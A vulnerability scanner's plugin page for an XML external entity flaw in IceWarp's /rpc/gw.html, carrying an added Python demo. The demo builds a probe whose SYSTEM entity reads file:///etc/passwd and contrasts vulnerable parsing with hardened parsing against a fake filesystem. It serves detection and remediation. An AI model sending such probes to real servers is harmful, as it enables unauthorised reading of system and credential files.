IceWarp /rpc/gw.html XML External Entity Arbitrary File Disclosure

medium Nessus Plugin ID 68983

Synopsis

The remote web server hosts a PHP script that is affected by an XML external entity injection vulnerability.

Description

The version of IceWarp installed on the remote host is affected by an XML external entity injection (XXE) vulnerability that can lead to the disclosure of arbitrary data. The '/rpc/gw.html' script parses attacker-supplied XML with a parser that resolves external entities, so a remote, unauthenticated attacker can read arbitrary files that the web server process has access to by sending a specially crafted POST request whose XML body declares a SYSTEM entity pointing at the target file and references that entity in the request.
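
The following is an added example, not code from IceWarp or from the Nessus plugin, that shows the mechanism described above end to end: a scanner-style probe body with a SYSTEM entity, a server-side parse in the vulnerable configuration (external general entities resolved) next to the hardened one (resolution disabled), and the check a scanner applies to the response. Python's xml.sax stands in for the server's XML parser; the XML-RPC methodCall envelope, the method name, and the in-memory FAKE_FS "filesystem" are assumptions so the demo runs offline. The page does not document IceWarp's exact request format.

```python
"""XXE in an XML-RPC endpoint: vulnerable vs. hardened parsing (added example)."""
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges
from xml.sax.xmlreader import InputSource

# Constructed stand-in for the target host's disk so the demo runs offline.
# Contents end in "\n" because a trailing "]" or "\r" would be held back by
# expat's incremental tokenizer; files containing "<" or "&" would not parse
# as an external parsed entity at all (the classic XXE limitation).
FAKE_FS = {
    "file:///etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n"
                          b"nobody:x:65534:65534::/nonexistent:/usr/sbin/nologin\n",
    "file:///c:/windows/win.ini": b"[fonts]\n[extensions]\n",
}


def build_probe(target_uri="file:///etc/passwd", method="ping"):
    """Body of the POST a scanner would send to /rpc/gw.html.

    The <methodCall> envelope and the method name are assumptions. The DOCTYPE
    declares an external general entity and a string parameter references it,
    so a parser that resolves SYSTEM entities substitutes the file's contents.
    """
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE methodCall [\n'
        f'  <!ENTITY xxe SYSTEM "{target_uri}">\n'
        ']>\n'
        '<methodCall>\n'
        f'  <methodName>{method}</methodName>\n'
        '  <params><param><value><string>&xxe;</string></value></param></params>\n'
        '</methodCall>\n'
    )


class _FakeFsResolver:
    """Entity resolver that reads from FAKE_FS instead of the real disk."""

    def resolveEntity(self, public_id, system_id):
        source = InputSource()
        source.setByteStream(io.BytesIO(FAKE_FS.get(system_id, b"")))
        return source


class _StringParams(ContentHandler):
    """Collects the text of every <string> parameter in the request."""

    def __init__(self):
        super().__init__()
        self.params = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "string":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "string":
            self.params.append("".join(self._buf))
            self._buf = None


def parse_request(body, resolve_external_entities):
    """Parse an XML-RPC body and return its string parameters.

    resolve_external_entities=True reproduces the vulnerable configuration:
    SYSTEM entities are fetched and their contents spliced into the document.
    False is the fix: the entity reference is skipped and yields no text.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.setEntityResolver(_FakeFsResolver())
    handler = _StringParams()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(body.encode("utf-8")))
    return handler.params


def response_discloses(params):
    """Scanner-side check: did a parameter come back holding /etc/passwd content?"""
    return any("root:x:0:0" in p for p in params)


if __name__ == "__main__":
    probe = build_probe()
    print("vulnerable:", parse_request(probe, True))
    print("hardened:  ", parse_request(probe, False))
```

In a real scan the parameters returned by parse_request would instead be whatever the server echoes back (a fault string or the method's reply), and response_discloses is the marker check applied to that response body. The hardened path is the fix that any XXE workaround amounts to: the parser never fetches a SYSTEM identifier, so the reference resolves to nothing.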

Note that the application is reportedly also affected by an additional XML external entity vulnerability in the '/rpc/api.html' script. Additionally, the application is reportedly affected by multiple cross-site scripting vulnerabilities; however, Nessus has not tested for these additional issues.

Solution

Upgrade to version 10.4.5-1 or apply the workaround as referenced in the vendor's KB article.

See Also

http://www.nessus.org/u?e47e4d75

http://www.nessus.org/u?4c7d086b

Plugin Details

Severity: Medium

ID: 68983

File Name: icewarp_xml_external_entity_injection.nasl

Version: 1.7

Type: remote

Family: CGI abuses

Published: 7/19/2013

Updated: 1/19/2021

Supported Sensors: Nessus

Risk Information

CVSS Score Rationale: Information disclosure

CVSS v2

Risk Factor: Medium

Base Score: 5

Temporal Score: 4.1

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS Score Source: manual

Vulnerability Information

CPE: cpe:/a:icewarp:webmail

Required KB Items: www/icewarp_webmail

Exploit Available: true

Exploit Ease: Exploits are available

Exploited by Nessus: true

Patch Publication Date: 6/11/2013

Vulnerability Publication Date: 6/25/2013

Reference Information

BID: 60755